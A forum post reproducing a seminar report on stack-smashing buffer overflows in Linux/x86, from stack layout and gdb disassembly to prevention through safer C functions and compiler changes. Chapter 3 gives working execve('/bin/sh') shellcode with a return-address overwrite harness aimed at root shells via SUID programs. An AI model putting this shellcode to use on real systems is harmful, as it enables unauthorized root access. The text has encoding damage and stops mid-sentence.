ASK HERE

electronics seminars · 28-12-2009, 04:30 PM

[attachment=795]

Chapter 1. Introduction
By combining the C programming languageâ„¢s liberal approach to memory
handling with specific Linux filesystem permissions, this operating system
can be manipulated to grant unrestricted privilege to unprivileged accounts
or users. A variety of exploit that relies upon these two factors is commonly
known as a buffer overflow, or stack smashing vulnerability. Stack smashing
plays an important role in high profile computer security incidents. In order
to secure modern Linux systems, it is necessary to understand why stack
smashing occurs and what one can do to prevent it.
Pre-requisites
To understand what goes on, some C and assembly knowledge is required.
Virtual Memory, some Operating Systems essentials, like, for example, how a
process is laid out in memory will be helpful. You MUST know what a setuid
binary is, and of course you need to be able to -at least- use Linux systems.
If you have an experince of gdb/cc, that is something really good. Document
is Linux/ix86 specific. The details differ depending on the Operating System
or architecture youâ„¢re using.
Here, I have tried out some small buffer overflows that can be easily grasped.
The pre-requisites described above are explained is some detail below.
Linux File System Permissions
In order to better understand stack smashing vulnerabilities, it is first necessary
to understand certain features of filesystem permissions in the Linux
operating system. Privileges in the Linux operating system are invested solely
in the user root, sometimes called the superuser, rootâ„¢s infallibility is expected
under every condition including program execution. The superuser
is the main security weakness in the Linux operating system. Because the
superuser can do anything, after a person gains superuser privileges for example,
by learning the root password and logging in as root that person can
do virtually anything to the system. This explains why most attackers who
break into Linux systems try to become superusers.
Each program (process) started by the root user inherits the root userâ„¢s
allinclusive privilege. In most cases the inherited privilege is subsequently
passed to other programs spawned by rootâ„¢s running processes. Set UID
(SUID) permissions in the Linux operating system grant a user privilege to
run programs or shell scripts as another user.
Linux operating system, the process in memory that handles the program
execution is usually owned by the user who executed the program. Using a
unique permission bit to indicate SUID, the filesystem indicates to the operating
system that the program will run under the file ownerâ„¢s ID rather
than the userâ„¢s ID who executed the program. Often times SUID programs
are owned by root; while these programs may be executable by an underprivileged
user on the system, they run in memory with unrestricted access
to the system. As one can see, SUID root permissions are used to grant an
unprivileged user temporary, and necessary, use of privileged resources.
Many Linux programs need to run with superuser privileges. These programs
are run as SUID root programs, when the system boots, or as network
servers. A single bug in any of these complicated programs can compromise
the safety of your entire system. This characteristic is probably a design flaw,
but it is basic to the design of Linux, and it not likely to change. Exploitation
of this feature turned design flaw is critical in constructing buffer overflow
exploits.
1
Chapter 1. Introduction
Linux and the C programming language
The Linux operating system is inextricably linked to the C programming language.
All modern implementations of the Linux operating system are written
in the C programming language, including system binaries and the kernel.
What C gains in simplicity and efficiency, it sacrifices in terms of data integrity
and ease of use. The standard C library in most Linux implementations
is vulnerable to buffer overflows and memory leaks. Not to be interpreted
as errors in the design of the language, C assumes the programmer
is responsible for data integrity.
Once a variable is allocated memory space in C, the language does nothing
to insure that the expected contents of the variable fit into the allocated
memory. C programmers often use the term buffer and array interchangeably
thus, it is safe to define a buffer as a contiguous block of memory (core)
that holds multiple instances of an identical data type.
As with all variables in C, buffers are declared dynamic or static. Static
buffers which are explicitly defined in the source code and are allocated at
load time on the data segment in memory. Dynamic arrays are defined via
pointers to memory locations in source code and are allocated at run time
on the stack. Due to the obvious limitations on static arrays, dynamic allocation
is the method used in all major programs and applications in the
Linux environment. Thus, Smashing the stack or stack overflow exploits are
concerned only with programs that do dynamic allocation.
2
Chapter 2. Whatâ„¢s a Buffer Overflow?
Memory layout
If you know C, you - most probably - know what a character array is. Assuming
that you code in C, you should already know the basic properties
of arrays, like: arrays hold objects of similar type, e.g. int, char, float. Just
like all other data structures, they can be classified as either being "static" or
being "dynamic". Static variables are loaded to the data segment part of the
program, whereas dynamic variables are allocated and deallocated within
the stack region of the executable in the memory. And, "stack-based" buffer
overflows occur here, we stuff more data than a data structure, say an array,
can hold, we exceed the boundaries of the array overriding many important
data. Simply, it is copying 20 bytes to an array that can handle only 12
bytes...
Memory layout for a Linux ELF binary is quite complex. It has become even
more complex, especially after ELF ("Executable and Linkable Format") and
shared libraries are introduced. However, basically, every process starts running
with 3 segments:
Text Segment
Text Segment, is a read-only part that includes all the program instructions.
For such assembly instructions that are the equivalent of the below C code
will be included in this segment:
for (i = 0; i < 10; i++)
s += i;
Data Segment
Data Segment is the block where initialized and uninitialized (which is also
known as BSS) data is. For example,if you code:
int i;
the variable is an uninitialized variable, and itâ„¢ll be stored in the "uninitialized
variables" part of the Data Segment. (BSS) and, if you code;
int j = 5;
the variable is an initialized variable, and the the space for the j variable will
be allocated in the "initialized variables" part of the Data Segment.
Stack Segment
A segment, which is called "Stack", where dynamic variables (or in C jargon,
automatic variables) are allocated and deallocated; and here return addresses
for functions are stored temporarily. For example, in the following
code snippet, i variable is created in the stack, just after the function returns,
it is destroyed:
int myfunc(void)
{
int i;
for (i = 0; i < 10; i++)
3
Chapter 2. Whatâ„¢s a Buffer Overflow?
putchar("*");
putchar(â„¢\nâ„¢);
}
If we are to symbolize the stack:
0xBFFFFFFF ---------------------
| |
| . |
| . |
| . |
| . |
| etc |
| env/argv pointer. |
| argc |
|-------------------|
| |
| stack |
| |
| | |
| | |
| V |
/ /
\ \
| |
| ^ |
| | |
| | |
| |
| heap |
|-------------------|
| bss |
|-------------------|
| initialized data |
|-------------------|
| text |
|-------------------|
| shared libraries |
| etc. |
0x8000000 |-------------------|
_* STACK *_
Stack is in basic terms a data structure, which all of you will remember from
your Data Structures courses. It has the same basic operation. Itâ„¢s a LIFO
(Last-In, First Out) data data structure. Its processes are controlled directly
by the CPU via some special instructions like PUSH and POP. You PUSH
some data to the Stack, and POP some other data. Whoever comes in LAST,
heâ„¢s the one who will go out FIRST. So, in technical terms, the first that will
be popped from the stack is the one that is pushed last.
SP (Stack Pointer) register on the CPU contains the address of data that will
be popped from the stack. Whether SP points to the last data or the one after
the last data on the stack is CPU-specific; however, ix86 architecture, which
is our subject, SP points to the address of the last data on the Stack. In ix86
protected mode (32 bit/double word),PUSH and POP instructions are done in
4-byte-units. Another important detail to be noted here is that Stack grows
downward, that is, if SP is 0xFF, just after PUSH EAX instruction, SP will
become 0xFC and the value of EAX will be placed on 0xFC address.
4
Chapter 2. Whatâ„¢s a Buffer Overflow?
PUSH instruction will subtract 4 bytes from ESP (remember the above paragraph),
and will push a double word to the stack, placing the double wordin
the address pointed by the ESP register. POP instruction, on the other hand,
reads the address in the ESP register, POPs the value pointed by that address
from the Stack, and adds 4 to ESP (adds 4 to the address in the ESP
register). Assuming that ESP is initially 0x1000, letâ„¢s examine the following
assembly code:
PUSH dword1
;value at dword1:1, ESPâ„¢s value: 0xFFC (0x1000-4)
PUSH dword2
;value at dword2: 2, ESPâ„¢s value: 0xFF8 (0xFFC-4)
PUSH dword3
;value at dword3: 3, ESPâ„¢s value: 0xFF4 (0xFF8-4)
POP EAX
;EAXâ„¢ value 3, ESPâ„¢s value: 0xFF8 (0xFF4+4)
POP EBX
;EBXâ„¢s value 2, ESPâ„¢s value: 0xFFC (0xFF8+4)
POP ECX
;ECXâ„¢s value 1, ESPâ„¢s value: 0x1000 (0xFFC+4)
Stack, while being used as a temporay storage for dynamic variables, itâ„¢s
being used to store the return addresses for some fuction calls storing temporary
variables and for passing parameters to fuctions. And, of course, this
is where evil things come into ground.
EIP register, CALL & RET instructions
CPU, in each machine cycle, looks at whatâ„¢s stored in the Instruction Pointer
register (In ix86 32-bit protected mode this is EIP - Extended Instruction
Pointer) to know what to execute next. In the EIP register, the address of the
instruction that will be executed next is stored. Usually, the addresses are
sequential, meaning the next instruction thatâ„¢ll be executed next is, a few
bytes ahead of the current instruction in the memory. The CPU calculates
that "a few bytes" according to how many bytes long the current instruction
is; and adds that "a few bytes" value to the address of the present address.
To examplify, assume that the present instructionâ„¢s address is 0x8048438.
This is the value thatâ„¢s written in EIP. So, CPU is executing the instruction
thatâ„¢s found in memory location: 0x8048438. Say, itâ„¢s a PUSH instruction:
push %ebp
CPU knows that a PUSH instruction is 1 byte long, so the next instruction
will be at 0x8048439, which may be
mov %esp,%ebp
While executing the PUSH, CPU will put the address of MOV in EIP.
Okay, we said that the values thatâ„¢ll be put in EIP are calculated by the CPU
itself. What if we JMP to a function? The addresses of the instructions in the
function will be somewhere else in the memory. After they are executed, how
can the CPU know where to go on with the calling procedure and execute.
For this, just before we JMP to the function, we save the address of the next
instruction in a temporary register, say in EDX; and before returning from
the function we write the address in EDX to EIP back again. If we use JMP
to jump to the addresses of functions, that would be a very tiresome work
actually.
5
Chapter 2. Whatâ„¢s a Buffer Overflow?
However, ix86 processor family provides us with two instructions: CALL and
RET, making our lives easy! the CALL instruction writes that "next instruction
to be executed after function returns" (from then on, weâ„¢ll call this as
the "return address") to the stack. It PUSHes it onto the stack, and writes
the address of the function to EIP. Thus, a function call is made. The RET instruction,
on the other hand, POPs the "return address" from the stack, and
writes that address in the EIP. Thus weâ„¢ll safely return from the function,
and continue with the programâ„¢s next thread of execution.
Letâ„¢s have a look at the following code snippet:
x = 0;
function(1, 2, 3);
x = 1;
After several assembly instructions has been run for (x = 0), we need to go
the memory location where function() is located. As we said earlier, for this to
happen, first we copy the address of the return address, (the address of x = 1
instructions in this case.) to some temporary space (might be a register) jump
to the address space of function with JMP, and, in the end of the function
we restore the return address that weâ„¢d copied to the EIP.
All these dirty operations are done on behalf of us via CALL and RET by the
CPU itself, and you can get the details from the above paragraph. Generally,
the Stack region of the program can be symbolized like:
|_parameter_I____| ESP+8
|_parameter II___| ESP+4
|_return address_| ESP
ESP, EBP
The stack, as weâ„¢ve said, is also used to store dynamic variables. Dynamically,
the CPU PUSHes some data, as the program requests new space,
and POPs other data, when our program releases some data. To address
the memory locations, we use "relative addressing". That means, we address
the locations of data in our stack in relative to some criterion. And this criterion
is ESP, which is the acronym for Extended Stack Pointer. This register
points to the top of the stack. Consider this:
void f()
{
int a;
}
As you can see, in the f() function, we allocate space for an integer variable
named a . The space for the integer variable a will be allocated in the stack.
And, the computer will referece its address as ESP - some bytes. So the stack
pointer is quite crucial for the program execution. What if we call a function?
The calling function has a stack, it has some local variables, meaning it
should utilize the stack pointer register. Also, the function that is called from
whithin will have local variables and itâ„¢ll need that stack pointer.
To overcome this, we save the old stack pointer. We, just like we did for the
return address, PUSH the old ESP to the stack, and utilize another register,
named EBP to relatively reference local variables in the callee function.
6
Chapter 2. Whatâ„¢s a Buffer Overflow?
And, this is the symbolization of the Stack, if ESP is also PUSHed onto the
stack:
|_parametre_I___| EBP+12
|_parametre II__| EBP+8
|_return adress_| EBP+4
|___saved_ESP___| EBP ESP
|_local var I __| EBP-4
|_local var II__| EBP-8
In the above picture, parameter I and II are the arguments passed to the
function. After the return address and saved ESP, local var I and II are the
local variables of the function. Now, if we sum up all we said, while calling a
function:
Â¢ 1. We save the old stack pointer, PUSHing it onto the stack
Â¢ 2. We save the address of the next instruction (return address), PUSHing
it onto the stack.
Â¢ 3. And we start executing the instructions of the function.
These 3 steps are all done when we CALL a subroutine, say a function.
An Illustration
Letâ„¢s see the operation of the stack, and procedure prologue in a live example:
void fun(int a, int b, int c)
{
char z[4];
}
void main()
{
fun(1, 2, 3);
}
compile this with the -g flag to enable debugging: $ gcc -g a.c -o a
Letâ„¢s see the whatâ„¢s happened there: $ gdb -q ./a (gdb) disassemble main
Dump of assembler code for function main:
0x8048448 <main>: pushl %ebp
0x8048449 <main+1>: movl %esp,%ebp
0x804844b <main+3>: pushl $0x3
0x804844d <main+5>: pushl $0x2
0x804844f <main+7>: pushl $0x1
0x8048451 <main+9>: call 0x8048440 <fun>
0x8048456 <main+14>: addl $0xc,%esp
0x8048459 <main+17>: leave
0x804845a <main+18>: ret
End of assembler dump.
(gdb)
As you can see above, in main() the first instruction is:
0x8048448 <main>: pushl %ebp
which backs up the old stack pointer. It pushes it onto the stack.
7
Chapter 2. Whatâ„¢s a Buffer Overflow?
Then, copy the old stack pointer to the ebp register:
0x8048449 <main+1>: movl %esp,%ebp
Thus, from then on, in the function, weâ„¢ll reference functionâ„¢s local variables
with EBP. These two instructions are called the "Procedure Prologue".
Then, we PUSH the function fun()â„¢s arguments onto the stack in reverse
order:
0x804844b <main+3>: pushl $0x3
0x804844d <main+5>: pushl $0x2
0x804844f <main+7>: pushl $0x1
We call the function:
0x8048451 <main+9>: call 0x8048440 <fun>
As Iâ„¢ve explained by CALLâ„¢ing we PUSHed the address of instruction
addl $0xc,%espâ„¢s address 0x8048456 onto the stack. After the function
RETurned, we add 12 or 0xc in hex (since we pushed 3 args onto the stack,
each allocating 4 bytes (integers)).
Then we leave the main() function, and return:
0x8048459 <main+17>: leave
0x804845a <main+18>: ret
Ok, what happened inside the function fun() ?:
(gdb) disassemble fun
Dump of assembler code for function fun:
0x8048440 <fun>: pushl %ebp
0x8048441 <fun+1>: movl %esp,%ebp
0x8048443 <fun+3>: subl $0x4,%esp
0x8048446 <fun+6>: leave
0x8048447 <fun+7>: ret
End of assembler dump.
(gdb)
The first two instructions are just the same. They are procedure prologue.
Then we see a :
0x8048443 <fun+3>: subl $0x4,%esp
which subtracts 4 bytes from ESP. This is to allocate space for the local
z variable. We declared it as char z[4] remember? It is a 4-byte character
array. End, at the end, the function returns:
0x8048446 <fun+6>: leave
0x8048447 <fun+7>: ret
8
Chapter 2. Whatâ„¢s a Buffer Overflow?
A simple example
#include <string.h>
void fun(char *str)
{
char foo[16];
strcpy(foo, str);
}
void main()
{
char large_one[256];
memset(large_one, â„¢Aâ„¢, 255);
fun(large_one);
}
$ cc -W -Wall -pedantic -g c.c -o c
$ ./c
Segmentation fault (core dumped)
What we do above is simply writing 255 bytes to an array that can hold only
16 bytes. We passed a large array of 256 bytes as a parameter to the fun()
function. Within the function, without bounds checking we copied the whole
large_one to the foo, overflowing all the way foo and some other data. Thus
buffer is filled, also strcpy() filled other portions of memory, including the
return address, with A.
Here is the inspection of generated core file with gdb:
$ gdb -q c core
Core was generated by Ëœ./câ„¢.
Program terminated with signal 11, Segmentation fault.
find_solib: Canâ„¢t read pathname for load map: Input/output error
#0 0x41414141 in ?? ()
(gdb)
As you can see, CPU saw 0x41414141 (0x41 is the hex ASCII code for letter
A) in EIP, tried to access and execute the instruction located there. However,
0x41414141 was not memory address that our program was allowed to access.
In the end, OS send a SIGSEGV (Segmentation Violation) signal to the
program and stopped any further execution. When we called f(), the stack
looked like this:
|______*str______| EBP+8
|_return address_| EBP+4
|___saved_ESP____| EBP ESP
|______foo1______| EBP-4
|______foo1______| EBP-8
|______foo1______| EBP-12
|______foo1______| EBP-16
strcpy() copied large_one to foo, without bounds checking, filling the whole
stack with A, starting from the beginning of foo1, EBP-16. Now that we could
overwrite the return address, if we put the address of some other memory
segment, can we execute the instructions there? The answer is yes.
9
Chapter 2. Whatâ„¢s a Buffer Overflow?
Assume that we place some /bin/sh spawning instructions on some memory
address, and we put that address on the functionâ„¢s return address that we
overflow, we can spawn a shell, and most probably, we will spawn a root
shell, since youâ„¢ll be already interested with setuid binaries.
10
Chapter 3. The Attack
Shell Code
As shown in the previous section, by manipulating dynamically allocated
variables with unbounded byte copy operations, execution of arbitrary code
is possible via the return address blindly Ëœrestoredâ„¢ following a function exit.
The ability to execute arbitrary code instructions as the superuser is often
used with calls that will allow an attacker to continue executing indefinite
commands as root.
To obtain maximum root system privilege, the interactive bourne shell program
is spawned, /bin/sh. The bourne shell is a shell that exists on every
modern UNIX system, and is commonly the default system shell for the privileged
user. Any system shell can be used as shell code, however, in the
interest of keeping this study as generic as possible, /bin/sh is assumed.
In order to arrange an interactive shell situation, a static /bin/sh execution
sequence must appear somewhere in memory so that a manipulated Ëœreturn
addressâ„¢ can point to that location. This is accomplished by using an assembly
language hexadecimal string of the binary equivalent to the standard C
function call: execve(name[0], "/bin/sh", NULL). Assembly language equivalents
to this call are hardware implementation dependent . Using debugging
utilities, it is possible to dissect a call such as execve(name[0], "/bin/sh",
NULL) by breaking it down to a simple ASCII assembly sequence, and storing
it in a character array or other contiguous data structure. On an Intel x86
machine running Linux, the following is a list of steps used in formulating
shell:
Â¢ 1. The null terminated string /bin/sh exists somewhere in memory.
Â¢ 2. The address of the string /bin/sh exists somewhere in memory followed
by a null long word.
Â¢ 3. 0xb is copied into the EAX register.
Â¢ 4. The address of the string /bin/sh is copied into the EBX register.
Â¢ 5. The address of the string /bin/sh is copied into the ECX register.
Â¢ 6. The address of the null long word is copied into the EDX register.
Â¢ 7. The int $0x80 instruction is executed, a standard Intel CPU interrupt
Â¢ 8. 0x1 is copied into the EAX register.
Â¢ 9. 0x0 is copied into the EBX register.
Â¢ 10. The int $0x80 instruction is executed, a standard Intel CPU interrupt.
This listing can be reduced to x86 actual shell code in a standard ANSI C
character array.
How to execute /bin/sh ?
In C, the code to spawn a shell would be like this:
#include <unistd.h>
void main()
{
char *shell[2];
shell[0] = "/bin/sh";
shell[1] = NULL;
11
Chapter 3. The Attack
execve(shell[0], shell, NULL);
}
$ cc -W -Wall -pedantic -g shell.c -o shell
$ ./shell
bash$
If you look at the man page of execve , youâ„¢ll see that execve expects a pointer
to the filename thatâ„¢ll be executed, a NULL terminated array of arguments,
and an environment pointer, which can be NULL. If you compile and run the
output binary, youâ„¢ll see that you spawn a new shell.
So far so good... But we cannot spawn a shell in this way, right? How can we
send this code to the vulnerable program this way? We canâ„¢t! This poses us
a new question: How can we pass our evil code to the vulnerable program?
We will need to pass our code, which will possibly be a shell code, in the
vulnerable buffer. For this to happen, we have to be able to represent our
shell code in a string.
Thus weâ„¢ll list all the assembly instructions to spawn a shell, get their opcodes,
list them one by one, and assemble them as a shell spawning string.
First, letâ„¢s see how the above code will be in assembly. Letâ„¢s compile the program
as static (this way, also execve system call will be disassmbled) and
see:
$ gcc -static -g -o shell shell.c
$ objdump -d shell | grep \<__execve\>: -A 12
0804ca10 <__execve>:
804ca10: 53 pushl %ebx
804ca11: 8b 54 24 10 movl 0x10(%esp,1),%edx
804ca15: 8b 4c 24 0c movl 0xc(%esp,1),%ecx
804ca19: 8b 5c 24 08 movl 0x8(%esp,1),%ebx
804ca1d: b8 0b 00 00 00 movl $0xb,%eax
804ca22: cd 80 int $0x80
804ca24: 5b popl %ebx
804ca25: 3d 01 f0 ff ff cmpl $0xfffff001,%eax
804ca2a: 0f 83 00 02 00 jae 804cc30 <__syscall_error>
804ca2f: 00
804ca30: c3 ret
804ca31: 90 nop
Letâ„¢s analyze the syscall step by step: Remember, in our main() function, we
coded:
execve(shell[0], shell, NULL)
We passed: the address of string "/bin/sh", the address of NULL terminated
array, NULL (in fact it is env address).
Here in the main:
$ objdump -d shell | grep \<main\>: -A 17
08048124 <main>:
8048124: 55 pushl %ebp
8048125: 89 e5 movl %esp,%ebp
8048127: 83 ec 08 subl $0x8,%esp
804812a: c7 45 f8 ac 92 movl $0x80592ac,0xfffffff8(%ebp)
804812f: 05 08
8048131: c7 45 fc 00 00 movl $0x0,0xfffffffc(%ebp)
12
Chapter 3. The Attack
8048136: 00 00
8048138: 6a 00 pushl $0x0
804813a: 8d 45 f8 leal 0xfffffff8(%ebp),%eax
804813d: 50 pushl %eax
804813e: 8b 45 f8 movl 0xfffffff8(%ebp),%eax
8048141: 50 pushl %eax
8048142: e8 c9 48 00 00 call 804ca10 <__execve>
8048147: 83 c4 0c addl $0xc,%esp
804814a: c9 leave
804814b: c3 ret
804814c: 90 nop
before the call execve (call 804ca10 <__execve>), we pushed the arguments
onto the stack in reverse order. So, if we turn back to __execve:
We copy the NULL byte to the EDX register, we copy the addresss of the NULL
terminated array into ECX register, we copy the address of string "/bin/sh"
into the EBX register, we copy the syscall index for execve, which is 11 (0xb)
to EAX register.Then change into kernel mode.
All what we need is this much. However, there are problems here. We cannot
exactly know the addresses of the NULL terminated arrayâ„¢s and string
"/bin/sh"â„¢s addresses. So, how about this?:
xorl %eax, %eax
pushl %eax
pushl $0x68732f2f
pushl $0x6e69622f
movl %esp,%ebx
pushl %eax
pushl %ebx
movl %esp,%ecx
cdql
movb $0x0b,%al
int $0x80
Letâ„¢s try to explain the above instructions: If you xor something with itself,
you get 0, equivelant of NULL. Here, we get a NULL in EAX register.Then we
push the NULL onto stack. We push string "//sh" onto the stack,
2f is /
2f is /
73 is s
68 is h
pushl $0x68732f2f
We push string "/bin" onto the stack:
2f is /
62 is b
69 is i
6e is n
pushl $0x6e69622f
As you can guess, now the stack pointerâ„¢s address is just like the address of
our NULL terminated string "/bin/sh"â„¢s address. Because, starting from the
stack pointer which points to the top of the stack, we have a NULL terminated
character array. So, we copy the stack pointer to EBX register. See, we have
already placed "/bin/sh"â„¢s address into EBX register :
movl %esp,%ebx
13
Chapter 3. The Attack
Then we need to set ECX with the NULL terminated arrayâ„¢s address. To do
this, We create a NULL-terminated array in our stack, very similar to the
above one: First we PUSH a NULL. we canâ„¢t do PUSH NULL, but we can
PUSH something which is NULL, remember that we xorâ„¢d EAX register and
we have NULL there, so letâ„¢s PUSH EAX to get a NULL in the stack:
pushl %eax
Then we PUSH the address of our string onto stack, this is the equivelant of
shell[0]:
pushl %ebx
Now that we have a NULL terminated array of pointers, we can save its address
in ECX:
movl %esp,%ecx
What else do we need? A NULL in EDX register. we can movl %eax, %edx,
but we can do this operation with a shorter instruction: cdq. This instruction
sign-extends whatâ„¢s in EAX to EDX. :
cdql
We set EAX 0xb which is the syscall id of execve in system calls table.
movb $0x0b,%al
Then, we change into kernel mode:
int 0x80
After, we go into kernel mode, the kernel will exec what we instructed it:
/bin/sh and we will enter an interactive shell...
So, after this much philosophy, all what we need is to convert these asm
instructions into a string. So, letâ„¢s get the hexadecimal opcodes and assemble
our evil code. Here we put our evil code in the chracter array sc[]. Letâ„¢s test
our shell code:
char sc[]= /* 24 bytes */
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cdql */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80" /* int $0x80 */
;
main()
{
int *ret;
ret = (int *)&ret + 2;
*ret = sc;
}
14
Chapter 3. The Attack
$ gcc -g -o shellcode shellcode.c
$ ./shellcode
bash$
Hmm, it works.
What weâ„¢ve done above is, increasing the address of ret (which is a pointer to
integer) 2 double words (8 bytes), thus reaching the memory location where
the main()â„¢s return address is stored. And then, because retâ„¢s relative address
is now RET, we stored the address of string scâ„¢s address (which is our
evil code) into ret. In fact, we changed the return addressâ„¢ value there. The
return address then pointed to sc[]. When main() issued RET, the scâ„¢s address
has been written to EIP, and consequently, the CPU started executing
the instructions there, resulting in the execution of /bin/sh.
15
Chapter 3. The Attack
16
Chapter 4. Creative stack smashing
SUID root programs included in Linux distributions are not precompiled with
shell code as part of the binary. To exploit these type of programs, some
means must be used to insert the shellcode array into the runtime environment.
Stack smashers have devised creative ways to accomplish this. In
order to inject the shell code into the runtime process, stack smashers have
manipulated command line arguments, shell environment variables, and interactive
input functions with the necessary shell code sequence.
Not only do most stack smashing exploits rely upon shell code to accomplish
their task, but these type of exploits depend on knowing at what address
in memory this shell code will reside. Taking this into consideration, many
stack smashers have padded their shell code with NULL (or noop) assembly
operations this gives the shell code a Ëœwider spaceâ„¢ in memory and makes
it easier to guess where the shell code may be when manipulating the return
address. This approach, combined with an approach whereby the shell
code is followed by many instances of the Ëœguessedâ„¢ return address in memory;
is a common strategy used in constructing stack smashing exploits. An
additional approach, when small programs with memory restrictions are exploited,
is to store the shellcode in an environment variable.
SUID root programs by distribution
In order to search standard Linux distributions for SUID root programs, the
following command can be executed by the privileged user: /usr/bin/find /
user root perm 004000 print
This command is a systemwide search command for SUID root files; which,
as described, are crucial in constructing stack smashing exploits. On a Linux
machine running the 2.0.30 kernel, built from a modified version of the
Slackware distribution, 56 SUID root worldexecutable binaries existed on the
system. A subtle byte copying error in any one of the above programs could
allow for a stack smashing vulnerability. Comparatively, in a distribution of
the Solaris operating system, approximately 67 SUID root worldexecutable
programs on the system in total 12. As with the Linux distribution, an error
in the coding to handle dynamic string variables in any one of these system
binaries could allow for a stack smashing vulnerability. Using Linux and Solaris
as examples, one may conclude that a significant number of SUID root
binaries exist in the typical Linux distribution. Any one of these programs
can become a target for stack smashers, thus, prevention and protection of
these files is a necessity.
17
Chapter 4. Creative stack smashing
18
Chapter 5. Prevention and Security
Finding Buffer Overflows
As stated earlier, buffer overflows are the result of stuffing more information
into a buffer than it is meant to hold. Since C does not have any built-in
bounds checking, overflows often manifest themselves as writing past the
end of a character array. The standard C library provides a number of functions
for copying or appending strings, that perform no boundary checking.
They include: strcat(), strcpy(), sprintf(), and vsprintf(). These functions operate
on null-terminated strings, and do not check for overflow of the receiving
string. gets() is a function that reads a line from stdin into a buffer until
either a terminating newline or EOF. It performs no checks for buffer overflows.
The scanf() family of functions can also be a problem if you are matching
a sequence of non-white-space characters (%s), or matching a non-empty
sequence of characters from a specified set (%[]), and the array pointed to by
the char pointer, is not large enough to accept the whole sequence of characters,
and you have not defined the optional maximum field width.
If the target of any of these functions is a buffer of static size, and its other
argument was somehow derived from user input there is a good posibility
that you might be able to exploit a buffer overflow. Another usual programming
construct we find is the use of a while loop to read one character at a
time into a buffer from stdin or some file until the end of line, end of file, or
some other delimiter is reached. This type of construct usually uses one of
these functions: getc(), fgetc(), or getchar(). If there is no explicit checks for
overflows in the while loop, such programs are easily exploited.
To conclude, grep() is your friend. The sources for free operating systems and
their utilities is readily available. This fact becomes quite interesting once
you realize that many comercial operating systems utilities where derived
from the same sources as the free ones.
Stack Smashing Prevention
A centralized or decentralized approach can be taken to avoid stack smashing
security vulnerabilities. To do so, changes must be implemented in the
privileged programs themselves, in the C programming language compilers,
or in the operating system kernel. A centralized approach involves modification
of system libraries and/or an operating system kernel while a decentralized
approach involves the modification of privileged programs and/or C
programming language compilers. Of these two basic approaches, a decentralized
approach is more immediately expensive with respect to manpower
and workload, but cheaper in the long term providing a stable, long lasting
solution. A centralized approach is cheaper in the short term, with respect
to manpower and workload, but is near impossible to implement as a long
term solution.
Program modification
To effectively fix defective SUID root program, a number of modifications can
be made to the programâ„¢s source code to avoid stack smashing vulnerabilities.
Standard C byte copy or concatenation functions often are crucial in
most buffer overflow exploits. A list of vulnerable function calls in the C programming
language, and suitable replacement function (if available) is as
follows:
function suitable replacement
19
Chapter 5. Prevention and Security
gets() fgets()
sprintf()
strcat() strncat()
strcpy() strncpy()
streadd()
strecpy()
strtrns()
index()
fscanf()
scanf()
sscanf()
vsprintf()
realpath()
getopt()
getpass()
In general, functions that return a pointer to a result in static storage can be
used in stack smashing exploits. In other terms, standard C function calls
that copy strings without checking their length are insecure. Some vulnerable
functions have suitable Ëœdrop inâ„¢ replacements, others do not. Whenever
possible, alternative functions must be used to help insure that privileged
code is not susceptible to stack smashing exploits. In addition to using suitable
replacements for vulnerable functions, shell environment pointers and
excessive command line arguments also need to be checked for invalid data.
Recall that stack smashers are creative and often hide shell code and other
crucial exploit information in excessive command line arguments or environment
variables.
Thus, securing source code must be a comprehensive process to be effective,
and all avenues of unauthorized input must be inspected and properly
terminated if invalid.
Commercial programs such as CenterLine softwareâ„¢s Code Center or Pure
Atriaâ„¢s Purify, and noncommercial programs such as Brian Marickâ„¢s GCT or
Bruce Perenâ„¢s ElectricFence can be used to assist programmers in locating
buffer overflows and illegal function operations that standard C compilers
do not look for. However, programs such as these can only catch overflow
bugs reactively, not proactively; A test case must exist which provokes the
stack smashing hole. Furthermore, many of these programs can offer more
information than standard Linux facilities while investigating a programâ„¢s
abnormal memory operations.
As C debugging tools, these programs may offer more than simple Ëœsegmentation
violationâ„¢ messages. However, it is important to remember that these
programs are designed to remove bugs and do not specialize in security. Furthermore,
these programs do not consider the current or future filesystem
permissions of the program. The same battery of tests are submitted to a
program whether it runs as a privileged user or not.
In summary, automated debugging tools are useful in correcting known vulnerabilities,
however, they cannot detect future vulnerabilities and are limited
as security tools. Security and stability are synonymous. Programs that
use secure functions and accept less bad input data are not only more secure,
but run more efficiently and build faster. By changing existing code
and writing new code with security in mind, both privileged code and nonprivileged
code share the benefits. Recalling the ease in which privileged program
execution can be transferred, it is important to note that privileged
code often trusts non privileged code. Privileged processes may assume that
all binaries, privileged and non privileged, are to be trusted.
By using more secure programming practices on all Linux system code, every
segment of the code base is strengthened. Security and robustness both
20
Chapter 5. Prevention and Security
involve thinking about the ranges of allowable inputs and responses, and
limiting them so undesirable responses are not produced.
Modifying the code is the only near foolproof method of insuring that SUID
root programs are not exploited. Not only can this avoid buffer overflows in
programs, but it will build faster, more efficient, robust code with respect to
nonsecurity areas of the operating system. The OpenBSD project has paid
special attention to this.
The disadvantages of manually modifying all affected programs is obvious
since all subject programs must be checked by hand and recompiled. Thousands
of lines of source code must have all function calls and UID execution
privileges examined and changed, if necessary. In the free operating system
arena, systems such as Linux, FreeBSD, OpenBSD and NetBSD have full
source code distributions available for public use. Complete copies of the operating
system kernel and system utilities may be downloaded and modified,
allowing anyone to fix stack smashing vulnerabilities.
However, In contrast to this approach, commercial Linux operating systems
have limited, if any source code availability. As the chief decentralized approach
in avoiding stack smashing holes in the Linux operating system,
global code auditing is the most expensive in terms of necessary manpower
and workload but can offer the most in long term reliability and security.
Compiler modifications
An additional decentralized approach to preventing stack smashing vulnerabilities
is to modify the C language compilerâ„¢s performance in a given Linux
operating system concerning vulnerable functions. However, it is important
to note that, in most cases, these modifications to the C programming language
are not trivial and involve fundamental modifications to the concepts
behind the C programming language.
A simple approach of this nature involves modifications to the C compiler,
which do not affect the C programming language. For example, the BSDI and
OpenBSD operating systemsâ„¢ compilers generate warning messages when
compiling a program which uses dangerous function calls. Despite this
shortcoming, the main benefit of using an approach such as this is that it
encourages secure programming without changing the code or its performance.
A median approach of this nature involves slight modifications to the compiler,
such as those would modify only the dangerous functions in the C
library and perform a stack integrity check before referencing the appropriate
return value. In his proposed patch to the FreeBSD operating system, if
